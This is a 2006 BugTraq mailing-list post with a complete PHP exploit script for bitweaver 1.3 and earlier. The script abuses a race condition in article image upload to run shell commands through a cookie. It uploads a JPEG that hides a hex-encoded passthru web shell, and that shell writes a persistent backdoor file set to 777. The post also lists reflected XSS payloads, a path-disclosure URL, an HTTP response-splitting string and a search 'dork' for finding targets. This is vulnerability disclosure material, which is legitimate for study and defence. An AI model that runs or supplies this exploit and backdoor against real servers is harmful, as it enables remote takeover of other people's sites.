BugTraq
bitweaver <= v1.3 multiple vulnerabilities Jun 17 2006 12:30AM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: \"powered by bitweaver\"\r\n\r\n";

if ($argc<4) {

echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";

echo "host: target server (ip/hostname)\r\n";

echo "path: path to bitweaver\r\n";

echo "cmd: a shell command\r\n";

echo "Options:\r\n";

echo " -p[port]: specify a port other than 80\r\n";

echo " -P[ip:port]: specify a proxy\r\n";

echo "Examples:\r\n";

echo "php ".$argv[0]." localhost /bitweaver/ cat ./../../kernel/config_inc.php\r\n";

echo "php ".$argv[0]." localhost /bitweaver/ ls -la -p81\r\n";

echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";

die;

}

/*

software site: http://www.bitweaver.org/articles/

i)

vulnerable code in articles/BitArticle.php near lines 456-478:

...

if( !empty( $_FILES['article_image']['name'] ) ) {

// store the image in temp/articles/

$tmpImagePath = TEMP_PKG_PATH.ARTICLES_PKG_NAME.'/'.'temp_'.$_FILES['article_image']['na
me'];

$tmpImageName = preg_replace( "/(.*)\..*?$/", "$1", $_FILES['article_image']['name'] );

if( !is_dir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ) ) {

mkdir( TEMP_PKG_PATH.ARTICLES_PKG_NAME );

}

if( !move_uploaded_file( $_FILES['article_image']['tmp_name'], $tmpImagePath ) ) {

$this->mErrors['article_image'] = "Error during attachment of article image";

} else {

$resizeFunc = ( $gBitSystem->getPreference( 'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 'liberty_gd_resize_image';

$pFileHash['source_file'] = $tmpImagePath;

$pFileHash['dest_path'] = TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/';

// remove the extension

$pFileHash['dest_base_name'] = $tmpImageName;

$pFileHash['max_width'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;

$pFileHash['max_height'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;

$pFileHash['type'] = $_FILES['article_image']['type'];

if( !( $resizeFunc( $pFileHash ) ) ) {

$this->mErrors[] = 'Error while resizing article image';

}

@unlink( $tmpImagePath );

...

explaination:

a remote user can go to:

http://[target]/[path]/articles/edit.php

to submit an article to the administrator, you can attach an image there.

You can submit a file like this, with double extension:

suntzu1234.php.xxx

a temporary copy of the file is created in temp/articles/ folder and renamed

like this:

temp_suntzu1234.php.xxx

(see $tmpImagePath argument...)

you have about 0.1 / 0.2 seconds to launch commands :), because temporary file

is deleted

http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir

this works fine on most Apache servers...

note: this folder is not properly protected, we have an .htaccess file like this:

<FilesMatch "\.ph(p(3|4)?|tml)$">

order deny,allow

deny from all

</FilesMatch>

ii) two cross site scripting vulnerabilities:

http://[target]/[path_to_bitweaver]/users/login.php?error=<script>alert(
document.cookie)</script>

http://[target]/[path_to_bitweaver]/articles/index.php?feedback=<script>
alert(document.cookie)</script>

iii) a trick to see bitweaver "white screen of death":

http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuu
uuuuuuuu

and disclose full application path, database table prefix ,among other things...

iv) various http response splitting vulnerabilities, this is one:

http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers]

this is the exploit for i), it creates a backdoor called suntzu.php.xxx in

temp/articles/ when you succeed for the first time

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" .";}

else

{$result.=" ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}

}

return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

function make_seed()

{

list($usec, $sec) = explode(' ', microtime());

return (float) $sec + ((float) $usec * 100000);

}

$host=$argv[1];

$path=$argv[2];

$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0\r\n";

$packet.="User-Agent: GoogleBot/2.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: cmd=".$cmd."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (strstr($html,"*delim*"))

{ echo "Exploit succeeded...\r\n";

$temp=explode("*delim*",$html);

die($temp[1]);

}

$shell=

chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0xc0).chr(0x3c).ch
r(0x3f).

chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).ch
r(0x72).

chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).ch
r(0x72).

chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).ch
r(0x3b).

chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).ch
r(0x65).

chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).ch
r(0x30).

chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).ch
r(0x65).

chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).ch
r(0x5f).

chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).ch
r(0x67).

chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).ch
r(0x24).

chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).ch
r(0x5b).

chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).ch
r(0x72).

chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).ch
r(0x65).

chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).ch
r(0x4b).

chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).ch
r(0x29).

chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).ch
r(0x22).

chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).ch
r(0x22).

chr(0x3b).chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).ch
r(0x72).

chr(0x75).chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).ch
r(0x4b).

chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).ch
r(0x29).

chr(0x3b).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).ch
r(0x2a).

chr(0x64).chr(0x65).chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x22).ch
r(0x3b).

chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).chr(0x3d).chr(0x66).ch
r(0x6f).

chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).chr(0x73).chr(0x75).ch
r(0x6e).

chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).ch
r(0x2e).

chr(0x78).chr(0x78).chr(0x78).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).ch
r(0x22).

chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).ch
r(0x74).

chr(0x73).chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).ch
r(0x3c).

chr(0x3f).chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).ch
r(0x72).

chr(0x6f).chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).ch
r(0x72).

chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).ch
r(0x3b).

chr(0x73).chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).ch
r(0x65).

chr(0x5f).chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).ch
r(0x30).

chr(0x29).chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).ch
r(0x65).

chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).ch
r(0x5f).

chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).ch
r(0x67).

chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).ch
r(0x5c).

chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).ch
r(0x45).

chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).ch
r(0x74).

chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).ch
r(0x68).

chr(0x65).chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).ch
r(0x4f).

chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).ch
r(0x64).

chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).ch
r(0x6f).

chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).chr(0x65).chr(0x6c).ch
r(0x69).

chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).chr(0x70).chr(0x61).ch
r(0x73).

chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).ch
r(0x24).

chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).ch
r(0x5b).

chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).ch
r(0x63).

chr(0x68).chr(0x6f).chr(0x20).chr(0x5c).chr(0x22).chr(0x2a).chr(0x64).ch
r(0x65).

chr(0x6c).chr(0x69).chr(0x6d).chr(0x2a).chr(0x5c).chr(0x22).chr(0x3b).ch
r(0x3f).

chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).ch
r(0x63).

chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).chr(0x24).chr(0x66).ch
r(0x70).

chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).chr(0x68).chr(0x6d).ch
r(0x6f).

chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).chr(0x6e).chr(0x74).ch
r(0x7a).

chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).chr(0x2e).chr(0x78).ch
r(0x78).

chr(0x78).chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).ch
r(0x3b).

chr(0x0d).chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).ch
r(0x10).

chr(0x4a).chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x00).chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).ch
r(0xdb).

chr(0x00).chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).ch
r(0x01).

chr(0xff).chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).ch
r(0x00).

chr(0x01).chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).ch
r(0x01).

chr(0x03).chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).ch
r(0x00).

chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x08).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0xff).

chr(0xc4).chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).ch
r(0xc4).

chr(0x00).chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).ch
r(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).ch
r(0x0c).

chr(0x03).chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).ch
r(0x00).

chr(0x3f).chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).ch
r(0xd9).

chr(0x00).chr(0x00);

/*

this image has this code inside as EXIF metadata:

<?php

error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*";

$fp=fopen("suntzu.php.xxx","w");

fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo \"*delim*\";passthru(\$_COOKIE[cmd]);echo \"*delim*\";?>");

fclose($fp);

chmod("suntzu.php.xxx",777);

?>

*/

srand(make_seed());

$anumber = rand(1,99999);

$data='-----------------------------7d63b53760260

Content-Disposition: form-data; name="tk"

-----------------------------7d63b53760260

Content-Disposition: form-data; name="article_id"

-----------------------------7d63b53760260

Content-Disposition: form-data; name="preview_image_url"

-----------------------------7d63b53760260

Content-Disposition: form-data; name="preview_image_path"

-----------------------------7d63b53760260

Content-Disposition: form-data; name="title"

test

-----------------------------7d63b53760260

Content-Disposition: form-data; name="author_name"

test

-----------------------------7d63b53760260

Content-Disposition: form-data; name="article_type_id"

1

-----------------------------7d63b53760260

Content-Disposition: form-data; name="rating"

3

-----------------------------7d63b53760260

Content-Disposition: form-data; name="format_guid"

tikiwiki

-----------------------------7d63b53760260

Content-Disposition: form-data; name="edit"

test

-----------------------------7d63b53760260

Content-Disposition: form-data; name="preview"

Preview

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publishDateInput"

1

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publish_Month"

06

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publish_Day"

15

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publish_Year"

2006

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publish_Hour"

22

-----------------------------7d63b53760260

Content-Disposition: form-data; name="publish_Minute"

33

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expireDateInput"

1

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expire_Month"

06

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expire_Day"

15

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expire_Year"

2007

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expire_Hour"

22

-----------------------------7d63b53760260

Content-Disposition: form-data; name="expire_Minute"

33

-----------------------------7d63b53760260

Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000

-----------------------------7d63b53760260

Content-Disposition: form-data; name="article_image"; filename="suntzu'.$anumber.'.php.xxx"

Content-Type:

'.$shell.'

-----------------------------7d63b53760260--

';

$packet="POST ".$p."/articles/edit.php HTTP/1.0\r\n";

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$packet.="Referer: http://".$host.$path."articles/edit.php\r\n";

$packet.="Accept-Language: it\r\n";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63b53760260\r\n";

$packet.="Accept-Encoding: gzip, deflate\r\n";

$packet.="User-Agent: GoogleBot/2.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Content-Length: ".strlen($data)."\r\n";

$packet.="Connection: Close\r\n\r\n";

$packet.=$data;

if ($proxy=="")

{$ffpp=fsockopen($host,$port);}

else

{

$parts=explode(':',$proxy);

$ffpp=fsockopen($parts[0],$parts[1]);

}

fputs($ffpp,$packet);//we don't need output, quickly look for temporary file...

$packet="GET ".$p."temp/articles/temp_suntzu".$anumber.".php.xxx HTTP/1.0\r\n";

$packet.="User-Agent: GoogleBot/2.1\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: cmd=".$cmd.";\r\n"; //through cookies...

$packet.="Connection: Close\r\n\r\n";

for ($i=0; $i<=99; $i++)

{

sendpacketii($packet);

if (strstr($html,"200 OK")){

echo "temp_suntzu".$anumber.".php.xxx file found...\r\n";

if (!strstr($html,"passthru")) //not executed as php code

{ echo "Exploit succeeded...\r\n";

$temp=explode("*delim*",$html);

die($temp[1]);

}

else

{echo "Exploit failed...\r\n";}

}

}

fclose($ffpp);

//if you are here...

echo "Exploit failed...";

?>

original url: http://retrogod.altervista.org/bitweaver_13_xpl.html

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus